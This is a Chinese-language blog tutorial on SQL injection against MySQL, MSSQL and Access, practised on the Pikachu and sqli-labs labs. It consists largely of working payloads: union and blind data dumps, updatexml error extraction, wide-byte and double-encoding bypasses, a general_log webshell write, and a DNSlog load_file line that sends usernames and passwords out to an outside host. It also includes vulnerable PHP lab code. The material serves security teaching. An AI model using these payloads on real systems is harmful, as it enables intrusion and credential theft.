简介
练习靶场
注入本质
攻击的本质在于输入输出控制。
什么是SQL注入
- SQL注入漏洞的原理是由于开发者在编写操作数据库代码时,直接将外部可控的参数拼接到SQL语句中,没有经过任何过滤或过滤不严谨,导致攻击者可以使恶意语句在数据库引擎中执行
将用户输入的数据当作SQL语句执行,有2个关键条件:
- 参数带入数据库查询
- 参数用户可控
MySQL基础
-- 登录Mysql
-- $ mysql -u'数据库账号' -p'密码'
$ mysql -u'root' -p'owasp'
> use database_name; -- 使用库
> alter table table_name; -- 使用表
> select user() -- 获得当前用户名
> select databse() -- 获得当前数据库名
> select version() -- 获得当前数据库版本
> table_name='user_privileges' -- 用户权限表
> table_name='schema_privileges' -- 数据库库权限表
注入基础
MySQL 5.0以上版本自带数据库information_schema,记录当前MySQL下所有数据库名、表名、列名。information_schema:提供了访问数据库元数据的方式,元数据包括数据库名、表名、字段数据类型、访问权限等信息。符号点.表示下一级Information_schema.schemata:记录库名信息的表schema_name:记录库名的字段
Information_schema.tables:记录表名信息的表table_schema:记录库名的字段table_name:记录表名的字段
Information_schema.columns:记录列名信息的表table_schema:记录库名的字段table_name:记录表名的字段column_name:记录列名的字段
-- 查询全部库 -> information_schema.schemata 表中的 schema_name 列
select 1,schema_name from information_schema.schemata
-- 查询指定库中的全部表
select 1,table_name from information_schema.tables where table_schema="pikachu"
-- 查询全部列 -> information_schema.columns 表中的 column_name 列
select 1,column_name from information_schema.columns
-- 查询数据库库名、表名 information_schema.tables --
select distinct table_schema from information_schema.tables; -- 列出所有库,等价于show databases
select table_name from information_schema.tables where table_schema='table_name'; -- 列出指定库的所有表,等价于show tables;
-- 查询数据库库名、表名、字段名 information_schema.columns --
select column_name from information_schema.columns; -- 列出所有表的所有字段
select column_name from information_schema.columns where ; -- 列出指定表的所有字段
select column_name from information_schema.columns where table_schema='database_name' and table_name='table_name'; -- 列出指定库指定表的所有字段
order by x -- 获取字段数
version() -- 版本信息
database() -- 数据库名
user() -- 数据库用户
@@version_compile_os -- 操作系统
@@datadir -- 数据库存储目录
@@secure_file_priv -- 导入导出限制
注入流程
- 判断注入点
and 1=1
and 1=2
- 判断字段数
order by 1
order by 2
...- 查询库名
union select 1,2,database(),4
-- 也可以查询其它信息
user() # 当前用户
version() # 当前版本
database() # 当前库名
@@version_compile_os # 操作系统
- 爆表爆列
-- 爆表用group_concat()函数,需将目标据库名转换为十六进制
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=[十六进制数据库名]
-- 爆列,将目标表名转换为十六进制
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=[十六进制表名]
文件操作
- 文件读写均需要输入绝对路径
- 引号被过滤或闭合错误时,可将路径或写入的内容进行十六进制编码
-- load_file('file_name') 读取函数
select load_file('c:/file.txt');
select load_file(0x633a2f66696c652e747874);
-- into outfile 'file_name' 写入函数
select '123' into outfile 'c:/file.txt';
select 0x633a2f66696c652e747874 into outfile 'c:/file.txt';
可能出现的错误
文件读取一直返回NULL
- 原因:数据库用户权限不足,必须是root用户
文件写入报错:
The MySQL server is running with the --secure-file-priv option so it cannot execute this statement- 原因:mysql文件的导入和导出路径有默认的设置,即
secure-file-priv,当传入的csv文件路径与默认的路径冲突时就会报错。 secure-file-priv的值有三种情况:secure_file_priv=null,限制mysqld不允许导入导出secure_file_priv=/path/,限制mysqld的导入导出只能发生在默认的/path/目录下secure_file_priv='',不对mysqld的导入导出做限制
- 原因:mysql文件的导入和导出路径有默认的设置,即
注入扩展
通过日志写Shell
Mysql 5.0版本以上会创建日志文件,修改下面2个关于日志的全局变量,若对生成的日志有读写权限也可以GetShell
general log日志记录状态,当值为ON时,所执行的sql语句都会保存到general log file中general log file日志保存路径- Tips:修改日志路径后,可通过
select '<?php phpinfo();?>'写入phpinfo,然后浏览器访问该文件查看是否成功写入
SHOW VARIABLES LIKE 'general%'; -- 查看日志状态
SET GLOBAL general_log='on' -- 开启日志记录
SET GLOBAL general_log_file='/var/www/html/123.php' -- 修改日志记录路径,路径不存在会报错
PHP防注入
魔术引号,
php.ini配置文件中开启,对用户输入中的单引号进行转义magic_quotes_gpc = off
安全函数,将用户输入放于
addslashes()函数内,与魔术引号具有相同功能$id = addslashes($_REQUEST['id']);
上面防注入的一些绕过方法,后面详讲
- 编码绕过
- 宽字节注入
跨库注入
场景:网站A无注入点,网站B存在MySQL注入,且网站AB使用同一数据库。此时可利用网站B的注入点跨库查询获取网站A的数据。
条件:网站B数据库用户权限为root
获取所有数据库名
id=1 union select 1,schema_name,3 from information_schema.schemata获取指定数据库
pikachu下 表名id=1 union select 1,table_name,3 from information_schema.tables where table_schema='pikachu'获取指定表名
users下的列名id=1 union select 1,column_name,2 from information_schema.columns where table_schema='pikachu' and table_name='users'获取指定数据
id=1 union select 1,username,password from pikachu.users; -- 查询pikachu数据库下的users表
报错注入
Insert/delete/update注入:一般存在于增删改用户信息的地方。HTTP Header注入:有时候后台需要通过HTTP Header头获取客户端的一些信息,如UserAgent、Accept字段等,会对客户端的HTTP Header信息进行获取并使用SQL进行处理,可能会导致基于HTTP Header的SQL注入漏洞
基础
- 条件:后台没有屏蔽数据库报错信息,在语法发生错误时会输出到前端
- 思路:在MySQL中使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息。
select/insert/update/delete都可以使用报错来获取信息 常用函数:
updatexml(XML_Document, XPath_String, New_Value)XML_Document,表中字段名XPath_String,XPath格式的字符串New_Value,替换的值
- 此函数的作用是改变(查找并替换)XML文档中符合条件的节点的值。其中XPath定位参数必须是有效的,否则会发生错误。这里是思路是将查询表达式放在该参数中,查询结果会跟着报错信息一并返回。
- 其它函数:
ExtractValue((XML_Document, XPath_String)
实战演示
- 这里利用Pikachu靶场字符型注入(GET)进行演示。随便输入一个单引号
',可以看到返回报错信息,尝试报错注入 - 构造Payload
' and updatexml(1, version(), 0) # - 此处结果为
XPATH syntax error: '.53',可以看到返回的版本号显示不全,需要利用concat()函数 concat()函数可以把传进去的2个参数组合成一个完整的字符串并返回,同时也可以执行表达式,可以把参数和表达式执行的结果进行拼接并返回。0x7e是~的十六进制,可以防止返回的查询结果被截断。
' and updatexml(1, concat(0x7e, version()) ,3) #- 此时返回的结果是
XPATH syntax error: '~5.5.53' - 报错只能显示一行。假如执行以下语句获取表名,则会报错:
Subquery returns more than 1 row
' and updatexml(1, concat(0x7e, (select table_name from information_schema.tables where table_schema="pikachu" )) ,0) #- 可以通过
limit来操作返回的数量。limit 0,1为从第0个开始取,取1条
' and updatexml(1, concat(0x7e, (select table_name from information_schema.tables where table_schema="pikachu" limit 0,1)) ,3) #
......
' and updatexml(1, concat(0x7e, (select table_name from information_schema.tables where table_schema="pikachu" limit 4,1)) ,3) #
- 后面获取列名也是一样
' and updatexml(1,concat(0x7e, (select column_name from information_schema.columns where table_schema="pikachu" and table_name="users" limit 0,1)),3) #
......
' and updatexml(1,concat(0x7e, (select column_name from information_schema.columns where table_schema="pikachu" and table_name="users" limit 3,1)),3) #- 最后获取数据
' and updatexml(1,concat(0x7e, (select username from users limit 0,1)),3) #
' and updatexml(1,concat(0x7e, (select password from users limit 0,1)),3) #
盲注
普通联合注入和盲注的区别
- 普通注入效率高、兼容性差
- 盲注效率低、兼容性强
布尔盲注
很多时候网站会对这些报错信息进行屏蔽,或者经过处理后返回一些标准的信息,此时无法根据报错信息进行注入的判断。而这里的布尔盲注是通过对比网站对于"真"和"假"的返回结果,从而构造SQL查询语句,并根据网站返回结果来判断该语句的结果为真还是假。
- 此处使用Pikachu靶场中的布尔注入漏洞,当输入为真,即该用户存在时,返回用户信息。用户不存在或者语句为假时返回该
username不存在,并且已知kobe这个用户存在。因此可以构造语句如下:
kobe' and length(database())>6 #
kobe' and length(database())>7 #
- 使用
length()函数来获取当前数据库名的长度并进行比较,在>6时返回用户信息,即证明为真;>7时返回username不存在,即为假。由此可判断该数据库的长度为7 - 继续构造语句来猜解库名
kobe' and ascii(substr(database(),1,1))>111 #
kobe' and ascii(substr(database(),1,1))>112 # =>p
...
kobe' and ascii(substr(database(),7,1))>116#
kobe' and ascii(substr(database(),7,1))>117# =>u
- 此处
substr(database(),1,1))为从database()返回的数据库名中的第1位开始取值,取1位。并通过ascii()函数转换为ASCII码,将其分别与111和112进行比较。当该ASCII码>111时返回真,>112时返回假。由此可知该ASCII码为112,即p。以此类推,可以猜解出各个位置的字母,组合得到库名pikachu
时间盲注
主要函数
sleep(n),延迟n秒执行select * from user where id=1 and sleep(1);if (条件, True, False),当条件成立返回第2个参数,否则返回第3个参数select if(1=2, 'a', 'b');length(),获取长度mid(str, 1, 2),从第1位开始截取字符串,截取2个select mid('abcdef', 1, 2);ord、ASCII编码
- 猜解库名
-- 猜解库名长度,相等则返回0即sleep(0),否则sleep(5)
-- select sleep(if((select length(database())=4), 0, 2));
?id=1 and select sleep(if((select length(database())=3), 0, 2));
-- 猜解库名
-- select sleep(if((select database()='user'), 0, 3));
?id=1 and sleep(if((select database()='user'), 0, 3))
?id=1 and select sleep(if((select database()='dvwa'), 0, 3));
猜解表名
limit n-1,n查询第n个表mid(table_name,x,1)查询表中第x位的值
-- 猜解第1个表名长度
?id=1 union select 1,2,3,sleep(if(length(table_name)=4, 0, 3)) from information_schema.tables where table_schema=database() limit 0,1
-- 猜解第2个表名长度
?id=1 union select 1,2,3,sleep(if(length(table_name)=4, 0, 3)) from information_schema.tables where table_schema=database() limit 1,2
-- 猜解表名第1位
?id=1 union select 1,2,3,sleep(if(mid(table_name,1,1)='a', 0, 3)) from information_schema.tables where table_schema=database() limit 0,1
-- 猜解表名第2位
?id=1 union select 1,2,3,sleep(if(mid(table_name,2,1)='a', 0, 3)) from information_schema.tables where table_schema=database() limit 0,1
-- 使用ASCII码猜解表名
?id=1 union select 1,2,3,sleep(if(ord(mid(table_name,1,1))=97, 0, 1)) from information_schema.tables where table_schema=database() limit 0,1
Dnslog盲注
MySQL中的load_file()函数可以发起请求- 构造语句,利用
load_file()函数发起请求,使用DNSlog接收请求并获得数据。需要注意的是,此函数只能在Windows系统中使用。所以如果要使用DNSlog盲注,那么目标服务器必须是Windows
select load_file(concat('\\\\', 'test', '.mysql.xxx.ceye.io\\abc'));
select load_file(concat('\\\\', (select database()), '.mysql.xxx.ceye.io\\abc'));
- 使用
concat_ws函数分隔查询的数据。注意DNSlog无法记录特殊符号,这里使用X作分隔符
select load_file(concat('\\\\', (select concat_ws('X',username,password) from users limit 0,1), '.mysql.xxx.ceye.io\\abc'));- 如果想使用特殊字符分隔,也可以用
hex()函数将查询结果转换为16进制,最后将返回的数据进行解码即可
select load_file(concat('\\\\', (select hex(concat_ws('~',username,password)) from users limit 0,1), '.mysql.xxx.ceye.io\\abc'));宽字节注入
- 一个字符的大小为1个字节,即称为窄字节。大小为2个字节则称为宽字节。如
GBK、GB2312等编码都是宽字节。 - 1个字节为8位,可以表示
2^8即256个字符,所有的英文字符只有a~z,A~Z48个,所以完全可以使用1个字节表示。而中文远远不止256个,因此需要占2个字节。
注入原理
- 某些程序会对用户输入的一些特殊字符进行了处理。如用户输入
',则可能会在其前面添加一个\进行转义。
' union ...| 输入 | 处理 | 编码 | 查询 | 结果 |
|---|---|---|---|---|
' | \' | %5C%27 | id=1\' and | 不能注入 |
- 而此时如果需要绕过,可以尝试宽字节注入,黑客可以输入如下:
%df' union ...MySQL在使用GBK编码时,如果1个字符的
ASCII码>128,即到达汉字的范围,那么就会将该字符与后面1个字符组合成1个汉字- 此处即将
%df%5C组合成汉字運
- 此处即将
| 输入 | 处理 | 编码 | 查询 | 结果 |
|---|---|---|---|---|
%df' | %df\' | %df%5C%27 | id=運' and | 可以注入 |
练习
这里使用Sqlilab靶场中的Less-32进行练习
- 先分别输入
'和%df'测试一下。可以看到第2次会返回一个特殊字符和\',该特殊字符编码后会与\的编码组合成汉字,从而将\绕过
?id='
?id=%df'
- 后面的注入就跟普通注入没什么区别的,只需要在前面加个
%df
-- 判断字段数
?id=%df' order by 3 --+
?id=%df' order by 4 --+
-- 回显
?id=%df' union select 1,2,3 --+
-- 信息,库名:security
?id=%df' union select 1,database(),user() --+
- 猜表:
emails,referers,uagents,users
?id=%df' union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1 ),3 --+
?id=%df' union select 1,(select table_name from information_schema.tables where table_schema=database() limit 1,1 ),3 --+
?id=%df' union select 1,(select table_name from information_schema.tables where table_schema=database() limit 2,1 ),3 --+
?id=%df' union select 1,(select table_name from information_schema.tables where table_schema=database() limit 3,1 ),3 --+
- 猜字段。这里一开始使用如下语句猜解
users表的字段
?id=%df' union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 0,1),3 --+
-- 报错:You have an error in your SQL syntax; ... '\"users\" limit 0,1),3 -- ' LIMIT 0,1' at line 1
- 如果使用上面语句,就会发现
table_name后面的引号被\转义了,但是此处不能使用%df来绕过\,否则会变成查询user運这个表。即数据库接收到的语句如下:
?id=%df\' union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name=%df\"users%df\" limit 0,1),3 --+
- 最后解决办法是:先通过前面查询表名的语句查询得到表名,再将查询结果放在
table_name后面
-- 查询表名
select table_name from information_schema.tables where table_schema=database() limit 3,1
-- 将查询表名的语句放在table_name后
?id=%df' union select 1,(select column_name from information_schema.columns
where table_schema=database()
and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1)
limit 0,1),3 --+
- 通过调整
limit得到users表全部字段:id、username、password
?id=%df' union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1) limit 0,1),3 --+
?id=%df' union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1) limit 1,1),3 --+
?id=%df' union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1) limit 2,1),3 --+
- 最终轻松获取全部用户名及密码
?id=%df' union select 1,username,password from users limit 0,1 --+
...
?id=%df' union select 1,username,password from users limit 12,1 --+测试
- 黑盒:在可能的注入点后添加
%df,之后进行注入测试 白盒:
- 查看MySQL编码是否为GBK
- 是否使用
preg_replace把单引号替换为\' - 是否使用
addslashes()函数进行转义 - 是否使用
mysql_real_escape_string()函数进行转义
防御
- MySQL使用
UTF-8编码,不使用宽字节的编码(GBK、日文、韩文),可以从根本上避免宽字节注入 - 设置MySQL的连接参数,使用二进制的方式连接
character_set_client=binary- 使用
mysql_real_escape_string,mysql_set_charset('gbk', $conn)
二次编码注入
注入原理
urldecode()与PHP本身处理编码时,两者配合可构造数据消灭\
- 假设用户输入如下
1' union ...| 输入 | PHP自身编码 | 编码 | 查询 | 结果 |
|---|---|---|---|---|
1' | 1' | id=1\ | id=1\' and | 不能注入 |
- 而如果将
urldecode()函数放在不适当的位置,与PHP编码配合失误,则可能产生漏洞。假设用户输入如下:
1%2527 union ...
此时用户输入的处理流程为:
%25先被PHP自身编码,转换为%- 然后
%与后面的27组合成%27,并被urldecode()函数编码,转换为单引号'
| 输入 | PHP自身编码 | 转义 | 函数编码 | 查询 | 结果 |
|---|---|---|---|---|---|
1%2527 | 1%27 | 1%27(此时无',不会被转义) | 1' | id=1' and | 可以注入 |
环境准备
SQLilab中没有二次编码的练习靶场,需要自行搭建
- 先搭建好SQLilab靶场,然后在新建目录
Less-encode,并在目录下创建index.php,写入如下代码
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>二次编码注入</title>
</head>
<body bgcolor="#000000">
<div style ="text-align:right">
<form action="" method="post">
<input type="submit" name="reset" value="Reset the Challenge!" />
</form>
</div>
</right>
<div style=" margin-top:20px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<?php
include("../sql-connections/sql-connect.php");
error_reporting(0);
if(isset($_GET['id'])){
$id = mysql_real_escape_string($_GET['id']);
echo 'mysql_real_escape_string:'.$id."<br />";
$id = urldecode($id);
echo 'urldecode:'.$id.'<br />';
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo "<font size='5' color='#99FF00'>";
echo 'Your Login name:' . $row['username'];
echo "<br>";
echo 'Your Password:' . $row['password'];
echo "</font>";
}
else{
print_r(mysql_error());
echo "</font>";
}
}
else{
echo "Please input the ID as parameter with numeric value";
}
?>
</body>
</html>
练习
- 输入如下代码
?id=',可以看到被转义为\'
- 而输入
?id=%2527,则可以看到先被PHP本身编码为%27,再经过urldecode()函数转换为'
- 此时可以得知,只需要将单引号
'修改为%2527,然后按照正常方法注入即可
-- 判断字段数
?id=%2527 order by 3 --+
?id=%2527 order by 4 --+
-- 输出位置
?id=%2527 union select 1,2,3 --+
-- 信息收集
?id=%2527 union select 1,database(),user() --+
- 猜表:
emails,referers,uagents,users
?id=%2527 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1),3 --+
?id=%2527 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 1,1),3 --+
?id=%2527 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 2,1),3 --+
?id=%2527 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 3,1),3 --+
- 猜字段。这里一开始使用如下语句猜解
users表的字段 - 同前面宽字节注入一样,如果直接使用
table_name='xxx'来过滤需要查询的表时会报错,因为引号会被转义,最终查询的是table_name=\'xxx\'
?id=%2527 union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),3 --+
通过将猜表的语句放到
table_name后- 第1个
limit定位需要查询字段的表 - 第2个
limit用于逐个输出该表的字段:id、username、password
- 第1个
?id=%2527 union select 1,(select column_name from information_schema.columns
where table_schema=database()
and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1)
limit 0,1),3 --+
- 最终得到全部数据
?id=%2527 union select 1,username,password from users limit 0,1 --+
....
?id=%2527 union select 1,username,password from users limit 12,1 --+测试
- 黑盒:在可能的注入点后键入
%2527进行测试 白盒:
- 是否使用
urldecode()函数 urldecode()函数是否在转义方法之后
- 是否使用
二次注入
注入原理
二次注入分为以下2步:
- 找到插入数据的地方,插入恶意数据。插入数据时,程序仅对其中的特殊字符进行转义,但是写入数据库时还是保留了原来的数据,但是数据本身包含恶意内容
- 找到调用数据的地方,调用恶意数据。当数据被存到数据库后,程序就会认为数据是可信的,在下次需要进行查询时,直接从数据库取出恶意数据,没有进一步的检验和处理,从而造成SQL二次注入。
练习
这里使用Sqlilab靶场中的Less-24进行练习
进入
Less-24,点击下方New User click here?新建一个用户- 用户名为:
admin '# - 密码随意,这里是
123
- 用户名为:
- 点击
Register,页面显示注册成功。看看现在数据库里有哪些用户
- 可以看到,用户名
admin '#直接被插入到数据库中,并没有进行转义等处理 - 登录一下新注册的用户,登录成功后可以修改密码,这里修改为
naraku
- 页面显示修改成功,再次看看数据库中的用户。可以发现,
admin '#用户的密码没有变化,但admin的密码却被修改成naraku
分析
- 原因是该程序对数据库中取出的数据未进行处理,从而产生漏洞。具体可以查看
Less-24目录下的pass_change.php文件,主要代码如下:
if (isset($_POST['submit'])){
# Validating the user input........
$username= $_SESSION["username"]; // 用户名
$curr_pass= mysqli_real_escape_string($con1, $_POST['current_password']); // 原密码
$pass= mysqli_real_escape_string($con1, $_POST['password']); // 新密码
$re_pass= mysqli_real_escape_string($con1, $_POST['re_password']); // 再次输入新密码
if($pass==$re_pass){
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
$res = mysqli_query($con1, $sql) or die('You tried to be smart, Try harder!!!! :( ');
$row = mysqli_affected_rows($con1);
echo '<font size="3" color="#FFFF00">';
echo '<center>';
if($row==1){...}
else{...}
}
else{...}
}
...- 程序只对
curr_pass、pass、re_pass等用户输入的数据进行处理,而未对从数据库取出的$username作处理。而当传入以上数据修改密码时,PHP执行语句如下:
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
# 实际语句:
$sql = "UPDATE users SET PASSWORD='naraku' where username='admin '# ' and password='123' ";
- 数据库接收并执行的SQL为:
UPDATE users SET PASSWORD='naraku' where username='admin '# ' and password='123'
- 可以看到,尽管
curr_pass不正确,但由于判断原密码是否正确的部分被注释掉了,所以这里可以直接将admin用户的密码修改为naraku。
防御
- 不仅要对外部提交的数据要进行检验。对于程序内部的数据调用,也同样要进行严格的检查
其它数据库
判断数据库类型
and exists ( select * from msysobjects ) > 0 -- 存在则为Access and exists ( select * from sysobjects ) > 0 -- 存在则为SQLServer
MSSQL注入
注入流程
判断是否有注入
and 1=1 and 1=2判断是否MSSQL
and user>0判断数据库系统
and (select count(*) from sysobjects) > 0 -- 存在则为MSSQL and (select count(*) from msysobjects) > 0 -- 存在则为Access其它
基本信息
-- 获取数据库信息 and 1=(select @@version) -- 获取当前数据库名称 and 1=(select db_name())获取库名
-- 获取第1个数据库名 and 1=(select top 1 name from master..sysdatabases where dbid>4) -- 获取第2个数据库名 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<>'第1个数据库名') -- 获取第3个数据库名 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<>'第1个数据库名' and name<>'第2个数据库名') -- 以此类推,逐步添加 [and name <> '上一个库名'] 可逐个往下查询得到全部数据库获取表名
-- 获取第1张表 and 1=(select top 1 name from sysobjects where xtype='u') -- 获取第2张表 and 1=(select top 1 name from sysobjects where xtype='u' and name <> '第1张表名') -- 获取第3张表 and 1=(select top 1 name from sysobjects where xtype='u' and name <> '第1张表名' and name <> '第2张表名') -- 以此类推,逐步添加 [and name <> '上一张表名'] 可逐个往下查询得到全部表获取列名
-- 获取第1列名 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name='表名')) -- 获取第2列名 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name='表名') and name <> '第1列名') -- 获取第3列名 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name='表名') and name <> '第1列名' and name <> '第2列名') -- 以此类推,逐步添加 [and name <> '上一张列名'] 可逐个往下查询得到该表全部列名获取数据
-- 获取第1个数据 and 1=(select top 1 列名 from 表名)
管理权限
- SA权限:数据库操作、文件管理、命令执行、注册表读取
- DB权限:数据库操作、文件管理
- Public权限:数据库操作
Access注入
注入流程
判断注入点
' and 1=1 and 1=2 or 1=1 or 1=2判断数据库表
and exists (select * from table_name) -- 猜解表名 and exists (select column_name from table_name) -- 猜解列名猜解
猜解字段长度
and (select len(column_name) from table_name)=5 -- 返回正常则该字段名长度等于5,也可以使用大于/小于 and (select len(admin) from admin)=5 -- 猜解admin字段长度猜解字段值:通过ASCII码判断来猜解字段值
-- 猜解admin表中password字段第1个数据,以此类推 and (select top 1 asc(mid(password, 1, 1)) from admin)=97 -- 同上,返回正常则等于 -- 猜解第2个数据 and (select top 1 asc(mid(password, 2, 1)) from admin)=97 -- 猜解第3个数据 and (select top 1 asc(mid(password, 2, 1)) from admin)=97
偏移注入
偏移注入的产生主要是用来解决猜到表名,但猜不到列名的情况
先猜解出该表的字段数
?id=1 union select 1,2,3,4,5,6,7,8,9,10 from admin使用
*号从后往前逐个删除替代,直至返回页面正常为止?id=1 union select 1,2,3,4,5,6,7,8,9,* from admin ?id=1 union select 1,2,3,4,5,6,7,8,* from admin ?id=1 union select 1,2,3,4,5,6,7,* from admin -- 假设此时返回正常代入计算公式
-- 设字段数为10,在第7位返回正常 -- 则 10-7=3 -- 4+3*2=10, X+(字段数-正常返回的数)*2=字段数,则在X=4后面使用以下语句 union select 1,2,3,4,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) -- 1+3*3=10, Y+(字段数-正常返回的数)*3=字段数,则在Y=1后面使用以下语句 union select 1,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
跨库查询
条件:同服务器下的站点存在注入点,知道目标站点数据库的绝对路径和数据库表,则可以通过跨库查询猜解表中的字段名
-- 绝对路径: D:\wwwroot\data.mdb
-- A是目标站点,B是存在注入的站点,AB处于同一服务器
-- admin是数据库中的表,user和password是admin表中的字段
?id=1 and 1=2 union select 1,2,user,4,5,6 from [D:\wwwroot\data.mdb].admin
?id=1 union select 1,2,user,password,5,6 from [D:\wwwroot\data.mdb].admin
版权属于:Naraku
本文链接:https://www.naraku.cn/posts/47.html
本站所有原创文章均采用 知识共享署名-非商业-禁止演绎4.0国际许可证 。如需转载请务必注明出处并保留原文链接,谢谢~